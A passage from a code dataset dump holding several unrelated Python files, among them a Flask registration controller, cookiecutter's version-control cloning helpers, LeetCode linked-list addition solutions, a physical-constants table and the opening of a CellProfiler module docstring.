%\n ext.name)\n ext.obj.name = ext.name\n self.data_sources[ext.name] = ext.obj\n LOG.info(_LI(\"Data source name {ds_name} loaded {entry_point}\")\n .format(ds_name=ext.name,\n entry_point=ext.entry_point_target))\n\n if len(self.data_sources) < len(config_ds):\n loaded_ds = set(six.iterkeys(self.data_sources))\n requested_ds = set(config_ds)\n raise ex.ConfigurationError(\n _(\"Data sources couldn't be loaded: %s\") %\n \", \".join(requested_ds - loaded_ds))\n\n def get_data_sources(self):\n config_ds = CONF.data_sources_types\n return [self.get_data_source(name) for name in config_ds]\n\n def get_data_source(self, ds_name):\n return self.data_sources.get(ds_name)\n\n def update_data_source(self, plugin_name, values):\n self.label_handler.update_data_source(plugin_name, values)\n return self.get_data_source(plugin_name)\n\n def validate_plugin_update(self, plugin_name, values):\n return self.label_handler.validate_data_source_update(\n plugin_name, values)\n\n def get_data_source_update_validation_jsonschema(self):\n return self.label_handler.get_data_source_update_validation_jsonschema()\n\n\nDATA_SOURCES = None\n\ndef setup_plugins():\n global DATA_SOURCES\n DATA_SOURCES = DataSourceManager()\n","sub_path":"sahara/service/edp/data_sources/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"471976041","text":"import sys\nimport pyzbar.pyzbar as pyzbar\nimport cv2\nimport barcode\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom GUI_2 import *\n\na = 0\nb = 0\nc = 0\nd = 0\ne = 0\nf = 0\n\napp = QApplication(sys.argv)\nDialog = QDialog()\nui = Ui_Dialog()\nui.setupUi(Dialog)\nDialog.show()\nBAR = barcode.Baread()\nwhile True:\n \n bar_data = BAR.baread()\n if bar_data == \"yeonmudong\":\n a += 1\n ui.report('[ 연 무 동 ]',a)\n ui.ym(a)\n elif bar_data == \"umandong\":\n b += 1\n ui.report('[ 우 만 동 ]',b)\n ui.um(b)\n elif bar_data == \"iuidong\":\n c += 1\n ui.report('[ 이 의 동 ]',c)\n ui.ii(c)\n elif bar_data == \"ingyedong\":\n d += 1\n ui.report('[ 인 계 동 ]',d)\n ui.ig(d)\n elif bar_data == \"jidong\":\n e += 1\n ui.report('[ 지 동 ]',e)\n ui.ji(e)\n elif bar_data == \"hadong\":\n f += 1\n ui.report('[ 하 동 ]',f)\n ui.ha(f) \n else:\n ui.error()\n\nsys.exit(app.exec_())","sub_path":"UI_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90347958","text":"import sys\nsys.stdin = open('input_contact.txt', 'r')\n\nfor tc in range(10):\n print('#%d' %(tc), end=' ')\n N, S = map(int, input().split())\n li = list(map(int, input().split()))\n queue = []\n queue.append(S)\n visited = [0] * (max(li)+2)\n idx_li = []\n visited[S] = 1\n while queue:\n x = queue.pop(0)\n for i in range(0, len(li)-1, 2):\n if li[i] == x and visited[li[i+1]] == 0:\n visited[li[i+1]] = visited[x] + 1\n queue.append(li[i+1])\n a = max(visited)\n while max(visited) == a:\n b = visited.index(max(visited))\n idx_li.append(b)\n visited[b] -= 1\n print(max(idx_li))","sub_path":"05_알고리즘/190906/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600312596","text":"from flask import redirect, request\n\nfrom traffgroup.core.X.xflask import Controller, Route, Error, capp\nfrom traffgroup.core.X.mako import 
render_template\nfrom traffgroup.core.model.partners import Partner\nfrom traffgroup.x.data import XDC\nimport time\nfrom traffgroup.core.model import meta\nfrom traffgroup.core.model.meta import Session\nimport cgi\n\n\n@Controller(\"/register\")\nclass RegisterController():\n \n @Route(\"/form\")\n def reg_form(self): # TODO: change template target for production\n return render_template('/register/form.mako')\n\n @Error(403)\n @Route(\"/finalize_form\")\n def reg_finalize_form(self, ex = None):\n try:\n Session.rollback()\n except Exception:\n pass\n \n if XDC.main:\n partner = Partner.Get(XDC.main.uid)\n if not partner:\n return render_template('/register/finalize.mako')\n elif partner.approved_by == 0:\n return render_template('/register/wait.mako')\n else:\n return render_template('/error/403.mako')\n else:\n return render_template('/error/403.mako')\n\n @Route(\"/finalize\", methods=['GET', 'POST'])\n def reg_finalize(self):\n try:\n if not XDC.main:\n raise RuntimeError(\"XDC Failure\")\n \n if Partner.Count(Partner.id == XDC.main.uid):\n return redirect(\"/register/success\") \n \n icq = cgi.escape(request.values['icq'])\n skype = cgi.escape(request.values['skype'])\n wmr = cgi.escape(request.values['wmr'])\n\n partner = Partner()\n \n partner.id = XDC.main.uid\n partner.wmz = \"\"\n partner.wmr = wmr\n partner.icq = icq \n partner.skype = skype\n\n partner.ts_spawn = time.time() # TODO: add states, flags, types \n partner.type = Partner.Type.REGULAR #@ReservedAssignment\n partner.state = Partner.State.ACTIVE\n partner.flags = 0 \n \n meta.Session.add(partner) #@UndefinedVariable\n meta.Session.flush() #@UndefinedVariable\n meta.Session.commit() #@UndefinedVariable\n return redirect(\"/register/success\")\n except KeyError as e:\n capp.logger.exception(\"Cannot finalize reg\")\n return redirect(\"/register/finalize_form\")\n \n \n @Route(\"/success\") \n def reg_success(self):\n return redirect(\"/members/\")\n \n \n @Route(\"/failure\")\n def reg_failure(self):\n capp.logger.info(\"Registration failure, redirect to form\")\n return redirect(\"/register/form\")\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"traffgroup/partners/controllers/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454598522","text":"#!/usr/local/bin/python2.7\nfrom argparse import ArgumentParser\nfrom sys import stderr, exit, stdout\nfrom os.path import basename\n\n\ndef norm_it( dict ):\n factor = 1 / sum( dict.values() )\n norm_dict = {}\n for gap in dict.keys():\n norm_dict[ gap ] = dict[ gap ]*factor \n\n return norm_dict\n\n\ndef weight_it( dict ):\n weight_dict = {}\n highest = max( dict.values() )\n for gap in dict.keys():\n weight_dict[ gap ] = dict[ gap ]/highest\n\n return weight_dict\n\n\ndef scorefile_reader( scorefile ):\n #fragA fragB offset gap_size counts closab_score clash_score total_rmsd\n dict = {}\n with open( scorefile, \"r\" ) as f:\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n gap_size = int( ls[0] )\n raw = float( ls[3] )\n dict[ gap_size ] = raw\n\n \n #return norm_it( dict )\n return weight_it( dict )\n\n\nif __name__=='__main__':\n ''' \n gap_size: \n when closab_score says yes, what percentage of getting correct\n '''\n parser = ArgumentParser()\n parser.add_argument(\"-s\", \"--scorefile\", required=True, help=\"\")\n args = parser.parse_args()\n\n dict = scorefile_reader( 
args.scorefile )\n with open( args.scorefile, \"r\" ) as f:\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n gap_size = int( ls[0] )\n stdout.write( l.strip() )\n stdout.write( \"%10.4f\\n\" % dict[ gap_size ] )\n\n","sub_path":"denovo_utils/reweight_closabscore_effectiveness_results.py","file_name":"reweight_closabscore_effectiveness_results.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465175577","text":"from marshmallow import fields, EXCLUDE\nfrom openpatch_core.schemas import ma, EnumField\nfrom openpatch_itembank.api.v1.schemas.test_version import TestVersionSchema\nfrom openpatch_itembank.api.v1.schemas.member import MemberSchema\nfrom openpatch_itembank.api.v1.schemas.member import MemberSchema\nfrom openpatch_itembank.api.v1.schemas.collection import TestCollectionSchema\nfrom openpatch_itembank.models.privacy import Privacy\nfrom openpatch_itembank.models.test import Test\n\n\nclass TestSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Test\n exclude = [\"public_description_text\"]\n unknown = EXCLUDE\n load_instance = True\n include_relationships = True\n\n id = fields.UUID()\n privacy = EnumField(Privacy)\n member = fields.Nested(\n MemberSchema, allow_none=True, only=[\"id\", \"username\", \"avatar_id\", \"full_name\"]\n )\n\n versions = fields.List(\n fields.Nested(\n TestVersionSchema(\n only=(\"test\", \"version\", \"version_message\", \"status\", \"latest\")\n )\n )\n )\n\n collections = fields.Pluck(\n TestCollectionSchema, \"collection\", many=True, dump_only=True\n )\n\n\nTEST_SCHEMA = TestSchema()\nTESTS_SCHEMA = TestSchema(many=True)\n\n","sub_path":"openpatch_itembank/api/v1/schemas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195389958","text":"\"\"\"Helper functions for working with version control systems.\"\"\"\nimport logging\nimport os\nfrom enum import Enum\nimport subprocess # nosec\nfrom shutil import which\nimport re\nimport click\n\nfrom cookiecutter.exceptions import (\n RepositoryCloneFailed,\n RepositoryNotFound,\n UnknownRepoType,\n VCSNotInstalled,\n)\nfrom cookiecutter.utils import make_sure_path_exists, prompt_and_delete\n\nlogger = logging.getLogger(__name__)\n\n\nclass VCS:\n \"\"\"Abstract base VCS class. Handles the cloning of VCS repositories.\"\"\"\n\n cmd = 'xyz'\n \"\"\"VCS command\"\"\"\n\n allowed_protocols = ['http', 'https', 'ssh', 'file']\n \"\"\"\n List of allowed protocols\n (no match if protocol not among allowed or specific protocols)\n \"\"\"\n\n identifiers = []\n \"\"\"VCS identifiers (implicit match if present in URL)\"\"\"\n\n protocols = []\n \"\"\"VCS-specific protocols (e.g. git://, svn://)\"\"\"\n\n suffixes = []\n \"\"\"VCS-specifix suffixes (e.g. .git, .hg)\"\"\"\n\n not_found_errors = []\n \"\"\"\n Error messages returned by the VCS if the repo was not found (lowercase)\n \"\"\"\n\n branch_errors = []\n \"\"\"\n Error messages returned by the VCS if the branch could not be checked out\n (lowercase)\n \"\"\"\n\n class MatchLevel(Enum):\n \"\"\"Match level returned by match_repo_url.\"\"\"\n\n NONE = 0\n IMPLICIT = 1\n EXPLICIT = 2\n\n @classmethod\n def match_repo_url(cls, url):\n \"\"\"\n Check if the raw URL input matches this VCS.\n\n Return match level:\n\n | **NONE:** Does not match\n | **IMPLICIT:** Contains VCS identifier\n (e.g. 
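# Editor's note: a tiny numeric illustration of the two rescalings defined at
# the top of the reweight script above: norm_it makes the values sum to 1,
# weight_it divides by the maximum so the largest value becomes 1.0.
scores = {1: 2.0, 2: 6.0, 3: 2.0}  # illustrative gap_size -> raw values
normed = {k: v / sum(scores.values()) for k, v in scores.items()}
weighted = {k: v / max(scores.values()) for k, v in scores.items()}
assert abs(sum(normed.values()) - 1.0) < 1e-9
assert max(weighted.values()) == 1.0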
https://private.com/svnrepo, gitolite@server:team/repo)\n | **EXPLICIT:** Has VCS cmd prefix/protocol/suffix\n (e.g. svn://private.com/svnrepo,\n https://github.com/audreyr/cookiecutter.git,\n hg+https://bitbucket.org/foo/bar)\n\n :param url: Raw url parameter\n :return: VCS.VCS.MatchLevel, repo_url (or None)\n \"\"\"\n match = re.match(r'''(?:([\\w\\d]+)\\+)?((\\w+)://|\\w+@)(\\S+)''', url)\n\n if not match:\n return VCS.MatchLevel.NONE, ''\n\n prefix, protocol_raw, protocol, repo_path = match.groups()\n\n # Get repo url (without prefix)\n repo_url = ('' if protocol_raw is None else protocol_raw) + repo_path\n\n # If a protocol is stated, it has to be among the allowed protocols\n if protocol and protocol not in cls.allowed_protocols + cls.protocols:\n return VCS.MatchLevel.NONE, ''\n\n # If a VCS prefix is stated, it has to be equal to the VCS command\n # -> explicit match\n if prefix:\n if prefix == cls.cmd:\n return VCS.MatchLevel.EXPLICIT, repo_url\n else:\n return VCS.MatchLevel.NONE, ''\n\n # If the protocol is among the VCS-specific protocols,\n # return explicit match\n if protocol and protocol in cls.protocols:\n return VCS.MatchLevel.EXPLICIT, repo_url\n\n # If the repo url suffix is among the VCS-specific suffixes,\n # return explicit match\n if any(repo_path.endswith('.' + s) for s in cls.suffixes):\n return VCS.MatchLevel.EXPLICIT, repo_url\n\n # If the repo url contains an identifier, return implicit match\n if any(idt in repo_url for idt in cls.identifiers):\n return VCS.MatchLevel.IMPLICIT, repo_url\n\n return VCS.MatchLevel.NONE, ''\n\n @classmethod\n def is_installed(cls):\n \"\"\"\n Check if VCS is installed.\n\n :return: (bool) is_installed\n \"\"\"\n return bool(which(cls.cmd))\n\n @staticmethod\n def get_repo_dir(repo_name, clone_to_dir):\n \"\"\"\n Get the path of the cloned repository.\n\n :return: repo_dir\n \"\"\"\n return os.path.normpath(os.path.join(clone_to_dir, repo_name))\n\n @classmethod\n def clone(cls, repo_url, checkout, clone_to_dir, repo_dir):\n \"\"\"\n Clone the repository.\n\n :param repo_url: Repository URL\n :param checkout: Branch/Revision to check out\n :param clone_to_dir: Working directory for the VCS\n :param repo_dir: Path of the cloned repository\n :raise subprocess.CalledProcessError: if the VCS returned an error\n \"\"\"\n subprocess.check_output( # nosec\n [cls.cmd, 'clone', repo_url], cwd=clone_to_dir, stderr=subprocess.STDOUT,\n )\n if checkout is not None:\n subprocess.check_output( # nosec\n [cls.cmd, 'checkout', checkout], cwd=repo_dir, stderr=subprocess.STDOUT,\n )\n\n\nclass Git(VCS):\n \"\"\"Git VCS class.\"\"\"\n\n cmd = 'git'\n\n identifiers = ['git']\n protocols = ['git']\n suffixes = ['git']\n\n not_found_errors = ['not found']\n branch_errors = ['error: pathspec']\n\n @staticmethod\n def get_repo_dir(repo_name, clone_to_dir):\n \"\"\"\n Get the path of the cloned repository.\n\n :return: repo_dir\n \"\"\"\n repo_name = repo_name.split(':')[-1].rsplit('.git')[0]\n return os.path.normpath(os.path.join(clone_to_dir, repo_name))\n\n\nclass Hg(VCS):\n \"\"\"Mercury VCS class.\"\"\"\n\n cmd = 'hg'\n\n identifiers = ['hg', 'bitbucket']\n protocols = ['hg']\n suffixes = ['hg']\n\n not_found_errors = ['not found']\n branch_errors = ['unknown revision']\n\n\nclass SVN(VCS):\n \"\"\"Subversion VCS class.\"\"\"\n\n cmd = 'svn'\n\n identifiers = ['svn']\n protocols = ['svn']\n suffixes = []\n\n not_found_errors = ['unable to connect', 'doesn\\'t exist']\n branch_errors = ['no such revision', 'syntax error in revision']\n\n 
@classmethod\n def match_repo_url(cls, url):\n \"\"\"\n Check if the raw URL input matches SVN.\n\n :param url: Raw url parameter\n :return: VCS.VCS.MatchLevel, repo_url (or None)\n \"\"\"\n level, repo_url = super().match_repo_url(url)\n\n # SVN-specific ssh prefix\n repo_url = re.sub(r'''^ssh://''', 'svn+ssh://', repo_url)\n\n return level, repo_url\n\n @classmethod\n def clone(cls, repo_url, checkout, clone_to_dir, repo_dir):\n \"\"\"\n Clone the repository.\n\n :param repo_url: Repository URL\n :param checkout: Branch/Revision to check out\n :param clone_to_dir: Working directory for the VCS\n :param repo_dir: Path of the cloned repository\n :raise subprocess.CalledProcessError: if the VCS returned an error\n \"\"\"\n # SVN SSH syntax: svn+ssh://private.com/myrepo\n command = [cls.cmd, 'export', repo_url]\n\n if checkout:\n command += ['-r', checkout]\n\n subprocess.check_output( # nosec\n command, cwd=clone_to_dir, stderr=subprocess.STDOUT\n )\n\n\nREPO_TYPES = [\n Git,\n Hg,\n SVN,\n]\n\n\ndef is_repo_url(repo_url):\n \"\"\"Return True if value is a repository URL.\"\"\"\n return any(\n vcs.match_repo_url(repo_url)[0] != VCS.MatchLevel.NONE for vcs in REPO_TYPES\n )\n\n\ndef identify_repo(repo_url):\n \"\"\"\n Determine if `repo_url` should be treated as a URL to a VCS repository.\n\n Repos can be identified by prepending \"hg+\", \"git+\" or \"svn+\"\n to the repo URL.\n\n :param repo_url: Repo URL of unknown type.\n :returns: (VCS, repo_url)\n :raise: UnknownRepoType if repo type could not be identified\n \"\"\"\n implicit_choice = None\n\n for vcs in REPO_TYPES:\n level, url = vcs.match_repo_url(repo_url)\n\n if level == VCS.MatchLevel.EXPLICIT:\n return vcs, url\n elif level == VCS.MatchLevel.IMPLICIT and implicit_choice is None:\n implicit_choice = vcs, url\n\n if implicit_choice is not None:\n return implicit_choice\n\n raise UnknownRepoType\n\n\ndef is_vcs_installed(repo_type):\n \"\"\"\n Check if the version control system for a repo type is installed.\n\n :param repo_type:\n \"\"\"\n return bool(which(repo_type))\n\n\ndef clone(repo_url, checkout=None, clone_to_dir='.', no_input=False):\n \"\"\"\n Clone a repo to the current directory.\n\n :param repo_url: Repo URL of unknown type.\n :param checkout: The branch, tag or commit ID to checkout after clone.\n :param clone_to_dir: The directory to clone to.\n Defaults to the current directory.\n :param no_input: Suppress all user prompts when calling via API.\n :returns: str with path to the new directory of the repository.\n \"\"\"\n # Ensure that clone_to_dir exists\n clone_to_dir = os.path.expanduser(clone_to_dir)\n make_sure_path_exists(clone_to_dir)\n\n # identify the repo_type\n vcs, repo_url = identify_repo(repo_url)\n\n # check that the appropriate VCS for the repo_type is installed\n if not vcs.is_installed():\n msg = \"'{0}' is not installed.\".format(vcs.cmd)\n raise VCSNotInstalled(msg)\n\n repo_url = repo_url.rstrip('/')\n repo_name = os.path.split(repo_url)[1]\n repo_dir = vcs.get_repo_dir(repo_name, clone_to_dir)\n logger.debug('repo_dir is {0}'.format(repo_dir))\n\n if os.path.isdir(repo_dir):\n clone = prompt_and_delete(repo_dir, no_input=no_input)\n else:\n clone = True\n\n if clone:\n try:\n vcs.clone(repo_url, checkout, clone_to_dir, repo_dir)\n except subprocess.CalledProcessError as clone_error:\n output = clone_error.output.decode('utf-8')\n\n # In case of error, print VCS output\n click.echo(\n 'Cloning of {} repository {} returned an error:\\n{}'.format(\n vcs.cmd, repo_url, output\n )\n )\n\n if 
if any(error in output.lower() for error in vcs.not_found_errors):\n raise RepositoryNotFound(\n 'The repository {} could not be found, '\n 'have you made a typo?'.format(repo_url)\n )\n if any(error in output.lower() for error in vcs.branch_errors):\n raise RepositoryCloneFailed(\n 'The {} branch of repository {} could not be found, '\n 'have you made a typo?'.format(checkout, repo_url)\n )\n # Raise base subprocess error if the VCS error can't be identified\n raise\n\n return repo_dir\n","sub_path":"cookiecutter/vcs.py","file_name":"vcs.py","file_ext":"py","file_size_in_byte":10147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"9303247","text":"\"\"\"\n\n445. Add Two Numbers II\n\n\nYou are given two non-empty linked lists representing two non-negative integers. The most significant digit comes first and each of their nodes contains a single digit.\nAdd the two numbers and return it as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\nFollow up:\nWhat if you cannot modify the input lists? In other words, reversing the lists is not allowed.\n\nExample:\n\nInput: (7 -> 2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 8 -> 0 -> 7\n\n\nSolution\nOverview\nPrerequisites\n\nThe problem is a combination of three basic problems:\n\nReverse Linked List.\n\nAdd Strings - a good problem to refresh the textbook digit-by-digit addition algorithm.\n\nAdd Two Numbers - the same problem as the current one, but the digits are stored in reverse order.\n\nTime and Space Complexity To Target\n\nEach list should be parsed at least once, hence the best time complexity we could have is O(N_1 + N_2), where N_1 and N_2 are the numbers of elements in the lists.\n\nSpace complexity is more interesting. It's relatively standard for linked list problems not to allocate any data structure but the output list. This way, one could target O(1) space complexity without taking the output list into account.
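\n\nAs a quick worked example of the digit-by-digit addition that all of the approaches below rely on: 342 + 465, processed from the least significant digit, gives 2 + 5 = 7, then 4 + 6 = 10 (write 0, carry 1), then 3 + 4 + 1 = 8 -- that is, 807.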
\n\"\"\"\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass AddTwoNumbers:\n\n def doit_stack(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n l1Stack, l2Stack = [], []\n while l1:\n l1Stack.append(l1.val)\n l1 = l1.next\n while l2:\n l2Stack.append(l2.val)\n l2 = l2.next\n\n prev, head, accum = None, None, 0\n while l1Stack or l2Stack:\n a, b = 0, 0\n if l1Stack:\n a = l1Stack.pop()\n if l2Stack:\n b = l2Stack.pop()\n\n val = (a + b + accum) % 10\n accum = (a + b + accum) // 10\n\n head = ListNode(val)\n head.next = prev\n prev = head\n\n if accum == 1:\n head = ListNode(accum)\n head.next = prev\n\n return head\n\n \"\"\"\n Algorithm\n\n Implement reverseList function.\n\n Reverse both input lists: l1 = reverseList(l1), l2 = reverseList(l2).\n\n Initialize the result list: head = None.\n\n Initialize the carry: carry = 0.\n\n Loop through lists l1 and l2 until you reach both ends.\n\n Set x1 = l1.val if l1 is not finished yet, and x1 = 0 otherwise.\n\n Set x2 = l2.val if l2 is not finished yet, and x2 = 0 otherwise.\n\n Compute the current value: val = (carry + x1 + x2) % 10, and the current carry: carry = (carry + x1 + x2) // 10.\n\n Update the result by adding the current value to the front.\n\n Move to the next elements in the lists.\n\n If the carry is not equal to zero, append it to the front of the result list.\n\n Return the result list: return head.\n\n Implementation\n\n Complexity Analysis\n\n Time complexity: O(N_1 + N_2), where N_1 + N_2 is the total number of elements in both lists.\n\n Space complexity: O(1) space complexity without taking the output list into account, and O(max(N_1, N_2)) to store the output list.\n \"\"\"\n def doit_reverse(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n def reverseList(head: ListNode) -> ListNode:\n last = None\n while head:\n # keep the next node\n tmp = head.next\n # reverse the link\n head.next = last\n # update the last node and the current node\n last = head\n head = tmp\n\n return last\n\n # reverse lists\n l1 = reverseList(l1)\n l2 = reverseList(l2)\n\n head = None\n carry = 0\n while l1 or l2:\n # get the current values\n x1 = l1.val if l1 else 0\n x2 = l2.val if l2 else 0\n\n # current sum and carry\n val = (carry + x1 + x2) % 10\n carry = (carry + x1 + x2) // 10\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # move to the next elements in the lists\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n\n if carry:\n curr = ListNode(carry)\n curr.next = head\n head = curr\n\n return head\n\n def doit_(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n # find the length of both lists\n n1 = n2 = 0\n curr1, curr2 = l1, l2\n while curr1:\n curr1 = curr1.next\n n1 += 1\n while curr2:\n curr2 = curr2.next\n n2 += 1\n\n # parse both lists\n # and sum the corresponding positions\n # without taking carry into account\n # 3->3->3 + 7->7 --> 3->10->10 --> 10->10->3\n curr1, curr2 = l1, l2\n head = None\n while n1 > 0 and n2 > 0:\n val = 0\n if n1 >= n2:\n val += curr1.val\n curr1 = curr1.next\n n1 -= 1\n if n1 < n2:\n val += curr2.val\n curr2 = curr2.next\n n2 -= 1\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # take the carry into account\n # so that every element is less than 10\n # 10->10->3 --> 0->1->4 
--> 4->1->0\n curr1, head = head, None\n carry = 0\n while curr1:\n # current sum and carry\n val = (curr1.val + carry) % 10\n carry = (curr1.val + carry) // 10\n\n # update the result: add to front\n curr = ListNode(val)\n curr.next = head\n head = curr\n\n # move to the next elements in the list\n curr1 = curr1.next\n\n # add the last carry\n if carry:\n curr = ListNode(carry)\n curr.next = head\n head = curr\n\n return head\n\n def doit(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n n1, cur1, n2, cur2 = 0, l1, 0, l2\n while cur1:\n n1 += 1\n cur1 = cur1.next\n\n while cur2:\n n2 += 1\n cur2 = cur2.next\n\n head = None\n cur1, cur2 = l1, l2\n while n1 > 0 and n2 > 0:\n val = 0\n if n1 >= n2:\n val = cur1.val\n cur1 = cur1.next\n n1 -= 1\n\n if n2 > n1:\n val += cur2.val\n cur2 = cur2.next\n n2 -= 1\n\n cur = ListNode(val)\n cur.next = head\n head = cur\n\n carry = 0\n curr1, head = head, ListNode()\n\n while curr1:\n carry, curr1.val = divmod(curr1.val + carry, 10)\n\n next = curr1.next\n head.next, curr1.next = curr1, head.next\n curr1 = next\n\n if carry:\n c = ListNode(1)\n head.next, c.next = c, head.next\n\n return head.next\n\n\n","sub_path":"PythonLeetcode/leetcodeM/445_AddTwoNumbersII.py","file_name":"445_AddTwoNumbersII.py","file_ext":"py","file_size_in_byte":7278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"528205961","text":"from math import pi\n#\tPhysical Constants in MKS units\nVersion = '1.1.0'\nR = 8.3144621\t\t\t\t\t\t\t\t# Universal Gas Constant (J/K/mol)\nc = 2.99792458e8\t\t\t\t\t\t\t# Speed of Light in Vacuum (m/s)\nG = 6.674e-11\t\t\t\t\t\t\t\t# Gravitational Constant (J m kg^-2)\nh = 6.62608e-34\t\t\t\t\t\t\t\t# Planck's Constant (J s)\nhbar = h/(2*pi)\t\t\t\t\t\t\t\t# Planck bar (J s)\nk = 1.38066e-23\t\t\t\t\t\t\t\t# Boltzmann constant (J/K)\npe = 1.602e-19\t\t\t\t\t\t\t\t# Proton Charge (coulomb)\nemass = 9.10939e-31\t\t\t\t\t\t\t# Electron Mass (kg)\npmass = 1.67262e-27\t\t\t\t\t\t\t# Proton Mass (kg)\neps0 = 8.854188e-12\t\t\t\t\t\t\t# Vacuum Permittivity (F/m)\nSBC = (pi**2)*(k**4)/(60*(c**2)*(hbar**3)); # Stefan-Boltzmann Constant (J s^-1 m^-2 K^-4)\nAvo = 6.02e23\t\t\t\t\t\t\t\t# Avogadro (atoms/mol)\nRalpha = 4*pi*eps0*(hbar**2)/(emass*(pe**2));\t# Bohr Radius (m)\n\n#\tUnit Conversion\t#\nAU = 1.496e11\t\t\t\t\t\t\t\t# Astronomical Unit (m)\npc = 3.086e16\t\t\t\t\t\t\t\t# Parsec (m)\n\n#\tOther\t#\nHF_Water = 334000\t\t\t\t\t\t\t# Heat of Fusion, Water, J/kg engineeringtoolbox.com","sub_path":"Other_Essentials/MKSConstants.py","file_name":"MKSConstants.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"619710668","text":"__doc__ = \"\"\"\\\nClassifyObjects\n===============\n\n**ClassifyObjects** classifies objects into different classes according\nto the value of measurements you choose.\n\nThis module classifies objects into a number of different bins according\nto the value of a measurement (e.g., by size, intensity, shape). It\nreports how many objects fall into each class as well as the percentage\nof objects that fall into each class. The module asks you to select the\nmeasurement feature to be used to classify your objects and specify the\nbins to use. 
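For example, classifying objects by an area measurement with custom\nthresholds of 100 and 500 (plus bins for objects below and above those\nvalues) assigns each object to one of three bins: area up to 100, 100 to\n500, or above 500.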
It also requires you to have run a measurement or\n**CalculateMath** prior to this module in the pipeline so that the\nmeasurement values can be used to classify the objects.\n\nThere are two flavors of classification:\n\n- The first classifies each object according to the measurements you\n choose and assigns each object to one class per measurement. You may\n specify more than two classification bins per measurement.\n- The second classifies each object according to two measurements and\n two threshold values. The module classifies each object once per\n measurement resulting in four possible object classes. The module\n then stores one measurement per object, based on the object’s class.\n\nNote that objects without a measurement are not counted as belonging in\na classification bin and will not show up in the output image (shown in\nthe module display window); in the object classification they will have\na value of False for all bins. However, they are still counted in the\ntotal number of objects and hence are reflected in the classification\npercentages.\n\n|\n\n============ ============ ===============\nSupports 2D? Supports 3D? Respects masks?\n============ ============ ===============\nYES NO NO\n============ ============ ===============\n\nSee also\n^^^^^^^^\n\nSee also **CalculateMath** and any of the modules in the **Measure** category.\n\nMeasurements made by this module\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n- **Image measurements:**\n\n - *NumObjectsPerBin:* The number of objects that are classified into\n each bin.\n - *PctObjectsPerBin:* The percentage of total objects that are\n classified into each bin.\n\n- **Object measurements:**\n\n - Single measurement: Classification (true/false) of the\n N\\ :sup:`th` bin for the M\\ :sup:`th` measurement.\n - Two measurements: Classification (true/false) of the 1\\ :sup:`st`\n measurement versus the 2\\ :sup:`nd` measurement binned into bins\n above (“high”) and below (“low”) the cutoff.\n\"\"\"\n\nimport functools\n\nimport numpy\nfrom cellprofiler_core.constants.measurement import COLTYPE_FLOAT\nfrom cellprofiler_core.constants.measurement import COLTYPE_INTEGER\nfrom cellprofiler_core.constants.measurement import IMAGE\nfrom cellprofiler_core.image import Image\nfrom cellprofiler_core.module import Module\nfrom cellprofiler_core.preferences import get_default_colormap\nfrom cellprofiler_core.setting import Binary\nfrom cellprofiler_core.setting import Divider\nfrom cellprofiler_core.setting import HiddenCount\nfrom cellprofiler_core.setting import Measurement\nfrom cellprofiler_core.setting import SettingsGroup\nfrom cellprofiler_core.setting import ValidationError\nfrom cellprofiler_core.setting.choice import Choice\nfrom cellprofiler_core.setting.do_something import DoSomething\nfrom cellprofiler_core.setting.do_something import RemoveSettingButton\nfrom cellprofiler_core.setting.text import Alphanumeric\nfrom cellprofiler_core.setting.text import Float\nfrom cellprofiler_core.setting.text import ImageName\nfrom cellprofiler_core.setting.text import Integer\nfrom cellprofiler_core.setting.text import LabelName\nfrom cellprofiler_core.setting.text import Text\n\nBY_SINGLE_MEASUREMENT = \"Single measurement\"\nBY_TWO_MEASUREMENTS = \"Pair of measurements\"\nTM_MEAN = \"Mean\"\nTM_MEDIAN = \"Median\"\nTM_CUSTOM = \"Custom\"\n\nBC_EVEN = \"Evenly spaced bins\"\nBC_CUSTOM = \"Custom-defined bins\"\n\nM_CATEGORY = \"Classify\"\nF_PCT_PER_BIN = 
